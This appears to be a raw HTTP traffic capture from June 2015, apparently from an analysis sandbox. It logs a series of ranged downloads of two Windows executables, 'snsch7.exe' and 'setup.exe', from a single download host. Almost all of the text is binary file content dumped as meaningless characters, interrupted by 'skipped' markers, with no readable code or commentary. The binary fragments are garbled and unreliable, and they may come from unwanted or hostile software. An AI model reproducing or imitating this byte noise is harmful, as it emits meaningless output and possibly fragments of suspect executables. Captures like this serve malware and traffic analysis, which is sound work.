t;..<Cc&.....y...N..e.N2.m..z....#.v[o.OM.@>#A...%...0A.f.4.<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=800

Content-Length: 250000

Content-Range: bytes 2500000-2749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694600.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.E..5KB..hIs..j\.q.O.[X..Y...I...b#..f.....ox......&x.......L%h...k.o.
..m....\/..,.z)\....`....C.<.cY5.q4.E....E..q.}..^....A>M..}.0.o
E..i&..Y`...F.g$.}.L.....v-s'22....._~....J.X$..g......\$...?.`R.....&
lt;...^.........:....ve...A..6y...,..~....\)8....H|b..L...]T.../f..(E.
.......k..O...c..<...T.d.w...]..q...U...G.e!|...}_.<.*.V(...0`..
D....Fo.p...r.. ...j..G-v..Z..L......h.Q..L..u*......C...wU..W..'D....
..\.V....#....w..,W.7.$D."..v....Dypb..;......6i...R.......E...T.,..MT
..S.<......3F.t..GZ..D.w....Uh...H......Q..8.......C.(.......H)..yM
h8...]..][email protected]..|..Y........s>>.....\....fN...2Kd
,...G\..H..*......C.\..".Qu$3=...Kq..&.....q...K.X.....jo4.-.....t...W
.......{.... "..X=yM.y.9V.E...;...B..... ...K......j.....c....4.=.9.l.
>zCK;7....}...q......LH._....8....|u,.k.(. N}....B..=..[..J.....d..
...C.g..&..)...Ok...H.......N'ji`..^...c.\.<.o..%...*.[..W..t.O.;.P
.0&.......`.p0...00k.O...*..5...........O...bn.h.>...P.....x.{.@N..
.sncf.'Z.3a:.{.P2..;..3....N%[email protected].`..DU....
?<\DY6.|.N.j.^.E......"&.......y.*9d......<q....>..U.(...!.V.
[email protected]#.%...J."=S%.~...x..1...C.I.{..
  .....N..W.S...t...Ho.......&...V...C...*.....^j.r.Zb.....S.Td)..S..C
...4..r......s]..pO.........y.......!Xt9....n.w..5:....<.}h.&x...e.
j..92P>.$1..Ci.........i.D...!....p>.@.!.LG!.....|.I.X..\By.K...
.C........_..d.)..r.:..Q..M..._....T..g.U[..'..;n...X...YK....0.z...V&
gt;K.C[..v..%...`q....d.2.....D..v.u".Q.u.......3.....Wa..;.$m.G.u<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=800

Content-Length: 250000

Content-Range: bytes 2750000-2999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694600.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
..[X...^..zhjz../..?..a.5.}.Q.:6..Nl.....U..:pAT.h._i.sr..Pv<....P&
gt;.U.e....|..._.L.Qq1./=..l....M..J..[..D.^............M.....M<.'.
6h.."...P7........4p] .qMIfQMHa.........&6.......O...R... ..i....Y..N.
.da.#.$.uW~...J.J7M....njm3.N....G..P.........E...8. E....u..~6....a..
.~P.'Q..2k....P|(......ib...[....0.{W5.x......m.z....F(.U{2.Ya<....
.v...D.]...B..c...Sj....GDd.._...j.;8.....z..~......A.....L...s.k..pf.
h...j..7f...P./..\...`..v.....g.UB....&...:).El\...KV.=<..<.6...
.c.1.RI.)0.O....[...I....|..}..@../M.......1;/l.........Ag.....O.kL.U!
M5.f..s..'.....lO...W>...P...........)...."%u .U..;..H.5vF.Ap.)M.qc
..8.......7t..%pi....J.U.)o...H....n...D.<v....;w.......^RK........
 [..*W...w.#..k.S.sE......<....T(.;*.S5.C............;...Z...rw Ee.
AS.e.M...V.n"..e]!f........ f:...Jz"........I...d.mp(...,[email protected]...
.y./mw.7K..,......3..[to...b?....%...aVn;r.!......M..Nh......w...k....
j=a.....>..g\(.....l...[....D..."..J.W...(d).....C........,...;.;.,
..w...G/.....a.8.X]..N.N..<..B.D#7.m.h.5..m...P8Hx.b..^..L.u.8..B;.
..F.1N.s...)..(h.. X..R..QU..1..0.bID...p...f....A.]..u.[.U. ...asRS.Z
.y.!.8.......~.g......s.....1..5.[O...l......../d...v?.N.p......;;.. .
Q.....h...%A..Z(.',......p...Vt..f!.o~D....X....".k..{.....L$...... ..
sA.]I...].. .h^3......Z..B...mfM.."2>...X.#........U.CT...N'.0.E...
.d.....I,9J.Ow.v..{.Q.R~.[/...l[..>.b.5g=....../i]q.........H.. [..
.,...M.~;...G....._n....!.:.yW.A[....$. ..o..`....[u.G.OKZ}I...41..6..
".N.......E..#Wc..d]..r&.}*......%...na.d...a.....4...X......../H.<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=800

Content-Length: 250000

Content-Range: bytes 3000000-3249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694600.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.....U.P..7....@t....:~.....@.>......5.....RtK.S...O.<..>.m..
..S.{..H.`.`........sv..=.f..<....aVY6u..S.I_.-....`...pT....I....j
4..-......*-o.........F..!....d._.Z...{.=".Ok.b.>0.z..z..t.....P...
.r;.8.........V,....5.. .r0.......|AX..p......xA.yO[.J.;.....(..\.N...
/.......D....(.9..r.)g!%R*xTb........,.w...............].m.eC.....`vK.
.....(......._..n.A.=......V(B...K.D.Gd.2.8....|.F.g...I.f.<..*..1.
.k[-4.*Y .....2r.}a].\.l......p....u.........q......5.9...F..U{eY\...&
lt;!....Q7.K3'..`{..'........;B9...gJ..... .Q.?C..W.u.?..i#&...3.VD-..
..80X....\.`[email protected],%.n.Q.9.yo.........4..~mt. .%H1H...
.m..]..B.!u........w1d.V...%ZF..F....q3.kJ.aR3r.k>.....dR..iFd../q^
..8k.B....gu.h.yiK..}........w.&z.}._..8F......Q..8.A.A:j....Y*_... c.
sg......\....}..qH]....Xyg..?xn....."...psp...Pb.....mP...._k:l.d..x~.
..u.Q.....-^.N..h......(o.r..f.... .....2R....{......TTi........X.....
6....\..0.e..........4.......|..Ia..4wS=..>................J.T^i..4
.t9._.tc.S.`i.2..W..2..A.']`... ....s.R......GH.~..&..?M....N..&\9..&.
...q.|Z......$kD.:../.B...G......Q....jF..:...c.....0hL})R.\XW4@"..l..
<P....y [email protected]...!.X4.....A.q|s..`.0w0!y.~7..'....5
d..'.0.~.?.WW....BK.!......m}-.F...n...xeA/....1.z,......`o8.....x..0}
.O...Z.......`....([email protected].}... V..#./..X..f.N.............I..h-.J
3Xh.....b...m.^F.0..5..MV....P....>.V.6s.. /..B(.w.$3.......-FK....
.Pb/S......<j...-......]t...b.7.Z m..c%k.{..h...u..t..x%..Ja/..P.._
....5.7....;...,-..P..|#.8M.......c-.=g.P..... ......<......v;?<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=3250000-3499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=800

Content-Length: 250000

Content-Range: bytes 3250000-3499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694600.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
|..T...R...9.a;.].'{Y..W......?.{...`x[.$N. R(H..8.......k....H.b.O_B.
...H..d..v.....\z.;WS.i...jv......D..i...|...?....7..x..."........I.o3
.l.S..?..".-....o.h.4:....p....".....Z...f.AN.].uvK.p.....>.xfI>
hW.O....a5..'os...-.[e.l.......i..P.l;kH..V..|.......[...I4R.........b
6{gT. wn.;X.U..G...<.............9...j....dy...=.5..AK...^..d......
9.4~......2..2...._q...6.#........ .F.p....sYH....h..._yX|...&E.....aO
).z.q.CK.....e....H..c$t....8....dey....!....?......(Q.s(.....9...e,..
f..NP...$.9..O..\o.>G.....>..8.A..F!I..A.a....O... ....'.[....FE
......8....0./."N...&a...8...)!....2uN..mV4 Q.}|.J..K.PWza..(.N..Z...J
...p.6|.#.(.3..~{I.....N.......F.....[;-........M...3U....q&g.u p.;. r
.....9.Y:..D?.r.XR.c..oh...X...A.%/.A.....ag\`.J..3.~@[email protected].~.b-
....H.O..1............?.....R...A..h..0.x......j."^....)".}....c....q.
.1.<.w.|-..E.vx]b..{....dJ..2.oA..*d...J.\.$}..Vv..p.\..X.m.."..b:.
'....~..B......J.9.s?;.@;k.w.....q..1.{u.......2w..Op...e......a8./9.E
ma.....j(.r..]......$r..|U..[..3Z.cS..t.....%d.c.B....iMG.q5..u.X...RL
..D9R ..A...=... ..eL...*..L....M0.(......o...&..6..7A....,G.......W&.
......TMl...~...._..D.o.|.hQ.MT..7../e%.../.e....&..S-..p4i......M.,.p
.....b.g3...>.\3K.n.....[..x..../....\J>....3....kR.0.V/.x..^8n.
......L.QY.......~.....OeMR.p...k...c...]>..{.,e.Y.F..b\BY..#l...&x
s...*.h..ZC.b.2.FxH.@`jL...ie...p...[.......Ibo=.........CD.M].t..M.Z.
....Me6_lp.....'.pM.7.!.. ?#{R$.O@. .....h..sEJ.......EE....A.mJT...Cj
...v...Y..X>.....U..b....J......5.uq..U..qh..3.w67.)........f..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=800

Content-Length: 250000

Content-Range: bytes 3500000-3749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694600.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.Az.... .$.....p.>....3f}s.X.\~R.4>.._.5._.22.w&.?...F..;p(hb.1.
.....G....S..r.9}0..W6|.cPg...f..O.......u...m.......g..D. r}&E}j.....
..H.. q.DI..x.$....2.u.......c..r5..f.I.Q..1a.W7.......2....b.y.......
T.T..*._[..#.q..5.........i.]3. ..C....;..#..........>..9..d.mU..&g
t;......s.2.R.s.W..w.2......-....H.. .<.'r....^h.....T.../.D.S,....
-..4..pc.v2.......2..1..AB...#.....I.1v....vW........f.......A..ROM.%.
"......]..s.p`..8*..@.(.1.x...%4g..;.:....t..'..y.T...@i}.s...if.... O
..x.%e._...G.$.....C....."..*]6.I...2...V2c..Z;I.d.......-..Pi......Y.
.....?..-..v...,. ..[._`....t.Gt.z1Z..g.%.r...}p....v.x^2m..s.,....(..
VX......D.......8:o..g....R=V....lr CQQ...........Z..<".....i......
,D.^_..E.A...h2Q3..:%.-..W|A.&. .Qv...bV..L.p ,w.M[b..&..{..v.......[ 
=K ....Q.....^g..X......F.....U|....r.....O\.......h.tfM..O.....h...#^
.....s..k3o..OaS...Up...4.7Oo..3.....X........_.<[email protected]{.......
i...c..=.z.S1V3}....v.|..a...]....] d.{...-....z0.\yq!..zi.T_.....5.j 
Vh|.i....A4.y..%.......-.SZ...e>.....s.......x...n..2S........"....
.>&,........f......tO..`X....@.=........S ..^...]o.|..6.w...=K ..a.
..S./......"......eg...c.=S....&..zY*...?UY9~<.^.=}...M.VB....?....
.._..U.H..q..s;'.1...^.{Fi;vB...i\l...0H.5.O}..T...A,.....5x..z.y...&M
.Y....79........3.;<..O*......u.fj......i.A.....j.Id...B../.j|J.V..
.p..,...n.(..)l.:.."..D.o>.!.....O9..l....jh..<..tm...h$.m/[email protected]
./4.x..1T|....q......F&..).........E.-......MW.f; TWn[....$.CD..G..p..
.n..q.Y.'8.7.UiE..;$.&z..f..2}..F.-........3.......m.x..H.{-.....`<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=3750000-3999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=800

Content-Length: 250000

Content-Range: bytes 3750000-3999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694600.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
D9|....a.b.F..n..l.._.`^.[...Z.f1f.H..."....YW....F.g.........w.G.{...
.....E..!..b.i..dR^Bh.......). ;.1/p...K....9?..!/../m........m}.....-
"...)..5o.M`......3.U .P. ..?4B.\,g...^..........:.C..(xE....y../:e...
....|U..._z....*.X.#.D.;.}d.'Q.S..Vxz....L........d.....8............Z
..M.n..C..s.oM.z.\=,4.y...P .."J.x..MP~......[.|[...Ql..B...5.6..-$.g.
.44h....[..q.{.C'<.m......VK..73..3.P..z..o...~..M.X...3~./v....U.&
lt;.[....?k.*.(..Q.z.(.....G..'..2........P9.. ...K..P..:`D...KW..DR%.
.kH..iW..Bz...>P...%..|B...:..i.;..z...Y.c.a..3..m..UC"#..OR.1....P
....'T/......:....t.-q.5...b.m:[email protected]..\k.f....bl..O.2^).[..d..
.rZ.H .....3....X. ..B.~.....]..1.{..........f...7....4rn.a.CM....'%..
y`...*.\BT.....1.4m8...c;7w~...2^....Q`.:K...z\...BSZn.].."..D..k..X.Q
.e..p)........$.q.....E.mL........,../...g...T.W..O....b.4....P`..3..i
.]9......#f...t....!...........P.1.......4...n.rU..b8.UT;[email protected]
.,mO..`*.k=R.[..Pz ........k...k.8..B....a....*.[...?3s.;v_....T.#..mQ
l.....G...ue... .?m.(...`....'...Gy.j....I.%-Y~.#...c.$Q..OU.s..9...TD
.Oi...K=:$.KJ!......pCH,....$....U...lf..3...u.%..K.....].V.........3.
4..q..~.....<....2..q.vS......N..........:Mx......o..k..l.C.I....C.
)..!.".F.c.!.,./.<?....<..-..^.tjS..F..FVDN..-.............}..-.
.Q:.....J..,g~`....J...w.!I^....n....[..a*.m.PU1.....= _.d...X>.2..
.n.W.S.d."......;..Lue.[....U..S..|.f1..b[T8....}x.e.....w......Y..=..
.S..$....6...yz.z.h..B..\...`..K..Y....Z]j.r.Z.C...5Or....`..6.....T.&
lt;.9.])EQ....j.I9..........2....:...."]ce......p..N......4X....;|<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=4000000-4249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=799

Content-Length: 250000

Content-Range: bytes 4000000-4249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.}d..../....Z.Bp?..........p.........\.El.e....A.P.....o...FW6..o.....
B....v....7...h.}..........?....y.1~FH.x..S8].9[..T.....n>.^.PE6..v
.C%.K.W9..W.^.Gw..8...s .H=.r..M.UE).g.P)...F.i.....Y.tc:...........(.
..e.i.{...p^g.HX?B9!Q..:.j[...-...T2..=..m.A..4...<.RH...8.E..}..e.
..Q..g....|.Z[-]...X...../....u.F...k..F..$....*4...c._ .YWN4XI......f
=.v... .....)..../...Y.&1..y.AW.....B...n.dOf\.uLw.\[email protected].
h.....aT./..#...b!.0RuF.g........qH__..S..O.?..0...#.dB...{...O.E.....
.f...|.....@&...../.QPoJ".rp.'F...;.H..X.F..a*.?c..J."...Br...M.F..cK.
..=$. XWa.%ih.q......N..WZ9K7.....h...T...W.3H.S0..:...\..&>..WT...
..q.*.`<p..V..H.].....U............S-...!..4.........b..D.......Z.Z
'.8....P.Y...UQ.d..hU...w..i........i..v.... J.p..Y$W....iz.9..$...9..
..w..s.{ ...j ...t...d.o.....gxa.(..|..w........Z ... ...Qp.j.Z^.Q.`..
..]..U.....t.;....-k;....5....O{.....O..z'l.....h.?.JM....-....5.m.L..
[email protected].<!....\gR.j.Z.
c....G...........uD.......A.;].UCf...8.(.H.'...\......S.b..E.m.De.cp}.
..........r_... ....t..E.?.#.w.N...E....;.......M....]..9.z.a;.h.."y..
.%.....$....E....[..V0]uU......6.... 17..k..U....... ..../.t1%@W..U...
.s...v.V......A.....\-.... .H....8v8....%..{..t...'_Ve.-...$.=.&..w.Rw
.......L...h...w..,.......5M...p...qj.d..!6.>....W..uC.....O..0Da..
.XO1.....5].....o.].r.....9,O.....lmMY.k..i.Ne*].......t.o|[email protected].
.5?.dZm.$H........9k....WWd..........I...B....e.a$...y..#./..~../KSG..
..lU......."..6...........j....p.&...1.H`>/M....F..h....z.&.Q].<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=4250000-4499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=799

Content-Length: 250000

Content-Range: bytes 4250000-4499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
LSpa.}yh4.R..R..j..w7.&..6.k....d...L...~.x.d....e.M..3...5~....I.L...
...Iv.*. .k..j.n..@.{.....--..Sa.......-..PCU}...G.r...Q.j.....i.I....
..Y....2Y......h..!../..L3....*..=;s.a..a..<.....C$Nf.............~
.."..O*i.n..........pf'...r.N._....XX.....,V,......M.d..8(.9}N d....IH
.9.?.8.6 .-....._.5r.....m...n%...w.../[....-.xK.WN...iR..{.....T.$).{
..r.....;W....|...5l......O..b8..jL.u3K..w...7D.!,-/.v.0.....r......e.
..Q3.V9.f65X.6....%ch....[..Z....r.^&.&.U.....)..o.h^9.=.L.d.q..f...gP
..hw.......p..I".%5..~.........._.....G..$.'..GU <|}z$..#.~.V....j.
......%...\.7]..l...D..)...=.}.qf!!.c.r..%K.aVzl........7......H.J....
.z.K......j.....*............=.Y....`.?iX.2J..c.....}........c..jd....
[email protected]'.....g...:..u...N....W.............kL6.a.....s.SN.H<Z...
t.....y.......7.y..]..|(f9fOh.;,......N..3|.y...v.0..4.X....Y..WI.Ws.l
....T..&.......\....f.By.....;. .D.b.J6.T.a.........K.._W.Pa..M.J...&g
t;....t.c....z...P.|U.#.#.s..L...F....^..G.......k'"...t....s.....r.S.
.%..4.8S..|...H.r...g'.S...9....r.^!.Gb.#.DQI./^G.H.........F1..BJW..g
8.t..............J...-.O!...,.k.......%........&~l..v.;..i...^.Y......
.26...&.....M'. "h........W...f.5.....&......$..:[email protected].. ..E?`.~...
.m...r...........(.......w..w...u.97.....m.E1R.7...NLQ..3.e..<.....
n.'...w.q.}.....2B.r...T7..\h......S.....3.\.q.fP..E.e{......w.i.....{
.......aIn.V.8.%...M.....f...........B....D....d.[[email protected]..:.
....3.....Or.k...4.&.?{G.u..~........]/9.q.%[email protected]\...
.......en..f...6.$..(.z;O...F...4...~..-.G}-..8. ...5.<2.t..r(.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=4500000-4749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=766

Content-Length: 250000

Content-Range: bytes 4500000-4749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..v.WN.....[..%.P..M...j<t.z..:..2[f.F.......;...>./..<,.E...
...I&.j.?.?..7.pP&_g.J5.x.,!a....u...k*P...pY...c...I.D[en..Xn$#\E....
..-.e..1{.....2.L..\;..G.n.0....P..Es._..J..[......h~'.Z..,@....?.p...
.8...........a.....`..H.SQ....c.." pI$.rh~..(..7sv...).A..]8...7.J..[.
.M...D.I.'.57.9....6..".x.E..D...2.pN.q....wV.wa3xU<....l2.E.......
.{..W...)....[^.....H.........p...'S......]..I..j.y.....#..?t..D..pB."
S._W./O...K...0?.4.D....>:Ch.(s."........!}...%.. .........}......Y
?....?...S..~8.NN.D.......Jr.....I..qW=.(.c..Z.c.\..W.1......K......!.
:V..?6c.;*yx;^....]b.....7.^q,.I:O...Mq@.....$.......H.M.....(.D6.-V..
..Ly.e..M.|E............e.p.*.6N.....qP...u.0.IN0........M..hQn)..1...
.Q{.2..@-; ..l.JC..n.d..5..0(.........0..c.d.l.2.....*7..............%
8i....;..iJ.;:6R..}...V..$.D%V.....I.q.....rjl.........#..............
0D......\/..l,V.f......q..T...J_..H?.4..S..j ..v....&Z.......s.. 8t.=.
.......\.5k...T}.I|...qQ..,.........I......k...v......I...uY[..`..yI.X
E;...}.%..}.)3..>..8......4w aj.Tg..J.F.G6...g....wq.dg...u..P..x.F
[email protected]@..D.jk..........^.....PI#..H.]^..5....r...F........m)...~
....>....])[email protected].......^... 3..8.8.=.....0r....
:..]......9o3Sl..d....X......1u..M..2.Pmw.........b..6..d6[].oy.|f..S.
.b7X|..6...p.......v..v...t....-$...k..]l...{.L....Ml}........wlo[..&.
...`.........h..n..s.....s.C..M..p..2..\~....A.&\.........U6.~........
@...Sv...C.sy5..-...wb...;W.~.4.|r.K.V.l..ssp..MJ...dN..@..%.4..@]r...
E#..~....#s..v=14..d1f.71...k ?z._)...e..T_..l..V....0........Ky..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=4750000-4999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=799

Content-Length: 250000

Content-Range: bytes 4750000-4999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.o....t.<@-.#..C.'..#...o..N..X''......{..AZTb.?...Q....G....."YT..
..,v.....s.S-.:.Kb. .....ZT-..<2..[..uwI"O........v]......a...:K..k
B._.A.>...L........5E.....k....d..,...._.:.Z.#.{.Yca.'...=..@a.(~@.
.....TGqJk[. ..........2.l..B.e......M.S.g.p9..j..t;..3....P.!..m..f..
t.dz.T...D4.#0......f ....%....$.>?1wp.w...../.F.g.....T]9....) .{.
.....`~.t.g...M.a...../^1e..m.8U...w.....I...J.t...d..Bx...W.O.gp.q...
..].9.7....Q..my.(.....='Nh....6.........H....9.....8Q!a...{.Ix8]..i.#
..7.Hc.......n....>..>....hO...R.G...@?..E4.HDJ(...* .i......d..
y......2Ii.x.:.....nn..:p....,..`....6..j^..6.....z9...d..1.fh.M...t.-
..!.I]].%..OG......u.[.Z.:....,...w...\..MB....u.C.._.(.sf.vp. -u..&..
d.".\'...Fz...\G...._M.....D. (.T.....,.)..PH.bb.n...<...../..U.  m
.....D.X..~w......P...;.0{.2.L.`D......].y.u.Vy.......-dJ...<K.....
..!.Epd.B.70..~=..8.G7....,..c......O........8.k.%s...1,..A.|.d.W.....
.Z.!...<.a.c.n.(...6.'....W..n....j...~n...I....[V......J..=e.7.uX&
lt;!..w.Q...Y.7..}?&.....E..}..... 8.5<s.-.j.7..}..o..L"..w..a.U.sd
>...E.y..J<h.]k.....i0.JL..;........^.4.i.d}..W.N.......j.i>.
..G..X..7.t..{[email protected]#...".|~....:j.....i....M.,.n=...
@.&.....}......F&...8..o........)..G...N.5.....8EC\wB...X!........PRF[
...`~..M.|UeX...C..<.LhR..........Z..w....Z.s.z.~v...A,m2...6......
...#..-...Y..Jw....S.......dHbh57]|....d..z.....u.[f.....zr......j'...
..E.N'.g....x".E9.m*._.i.d....*.~..z...ee..;;.w..HO~..B.zy.v5-..|.O..!
..[..|...........\go....\uQ....<[email protected]..|......<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=5000000-5249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:41 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=766

Content-Length: 250000

Content-Range: bytes 5000000-5249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694601.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
:.Z.,P...%..i..8.g........E]1(6.J..<..dI....SXq.......t.. .b<{LY
.)f..l.0.......Y..x.p..t..N.e2.......#e.X.....w*.......J6......0...?.e
..O.......E...>..t...d...X#J.....]Fr..$...j...e.......{[0.......|k.
>..W../.....6p.<.."......;.T.... 6_\6..Zj....3..=J-)R..cD...NV..
X[..^.z...V.m...L.......R......%..'[email protected]...|..
.K.[....k..X...M.-._.W.........=......k....OKu.b[$..f-....z....W.a"..n
(.R:.L4Q.\n1......p.g..4..n&.-.T0..".......ASN[..>..6b..:pN..Ic\;..
......y..h.P.!.....TG..?g....m...... .?.......9...........{.....z...M.
[email protected].'...p...oYU...Ru.).O.a..C.......ps.J.f$.....1MA...c'. 's.
iO.e.H....}.5..<.IP...........)-d.......pS.....b,{<.&]Y....nfnk=
}..V.....#......H...=....m..~.... 3...:....4.A.....<...;.r....Ho.Sd
h.{`.dL...!.k_`...[...W.L..... ..q.i.7p.|ymDW..t..i..8x...!...........
......6...\^.....M...C....k.x..dN)k..M...;..-.U...5x.....}...1.t.=...$
E.yfK2............M.........].....}b......:O.e..B.b...]8c...,..5..!x..
.......w...]....X.....q....olI.>.N1"..$$w..-...D>...GM..Bc..kxm.
.8P....<["...L;..i.~.<.....&P .\.j.#..4..v.s6......y...{...u....
he.....H.... .w.....;...\<..Y\...*...H9.5c...2...Kk.}B.e....l..*z|.
I...$'[email protected][CQbl|..'..u..8c..,...<..._...S.{%%
.......4..:[email protected]......"/..p.U..jPM#J..i.Uv.a........P...3...ZL
...C.........Qh..g....|..&.J...'..;...........u .zD..l...ZO....>.?.
...Qz;.......N......*[email protected].'......$..;.$...."T...Y.....A....D.2L...
d...y.~.;...k..."oX...F..a`..u........U...i......'zD....IRT. ~0`..<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=5250000-5499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=765

Content-Length: 250000

Content-Range: bytes 5250000-5499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
&.s.Jn....d....TWwOw.o...x..O.........t..Z...k.I..<=.f.^...2.......
[email protected]].B._.V.Z._bf..u...6
.&.QY9..=..t.V.>.l.nE....c...[u...G]....,..:d.U...g:M.K..f.;C:DwyX&
